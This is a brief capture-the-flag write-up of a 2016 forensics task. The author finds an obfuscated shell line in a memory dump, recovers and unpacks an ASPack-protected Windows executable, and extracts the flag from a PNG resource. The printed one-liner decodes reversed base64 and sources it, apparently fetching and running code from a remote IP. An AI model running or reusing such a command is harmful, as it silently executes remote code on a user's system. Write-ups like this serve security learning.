Rating:

# Memdump (Forensics, 400)

> We trying to capture the flag too! But that's what it left for us.

In this task we ware given a memdump2.xz containing about 132MB

During the searching file I found interesting line:
```
echo =owY1JHbg0ycggGd0BnOv8SN04SM4MjL1MjL1IzLqt0TwF3b | rev | openssl enc -a -d | rev | . /dev/stdin > /tmp/.KvCf56
```

After running this in console I get PE file:
```
out: PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows
```

I found out at file was protected by ASpack:
```
00 00 00 00 00 00 10 00 2e 74 65 78 74 00 00 00 |.........text...|
00 10 00 00 00 10 00 00 00 02 00 00 00 06 00 00 |................|
00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 e0 |............`...|
2e 64 61 74 61 00 00 00 00 10 00 00 00 20 00 00 |.data........ ..|
00 02 00 00 00 08 00 00 00 00 00 00 00 00 00 00 |................|
00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 |[email protected]...|
00 10 00 00 00 30 00 00 00 0e 00 00 00 0a 00 00 |.....0..........|
00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 |............@...|
2e 61 73 70 61 63 6b 00 00 20 00 00 00 40 00 00 |.aspack.. ...@..|
00 12 00 00 00 18 00 00 00 00 00 00 00 00 00 00 |................|
00 00 00 00 60 00 00 e0 2e 61 64 61 74 61 00 00 |....`....adata..|
```

Ollydbg + OllyDumpEx Plugin + ImportREC let me unpack file (Unpacking was aldo passible using FUU)
In the file section .rsrc was easy to seen string "FLAG IMG", was there also png magic numbers

![hex.png](hex.png)

Separation png image from file give us flag and 400 points

![flag.png](flag.png)

SharifCTF{39057E5702F8167AA641CA9AD7E9A15E}

Original writeup (https://github.com/raccoons-team/ctf/tree/master/2016-02-06-su-ctf/memdump-400).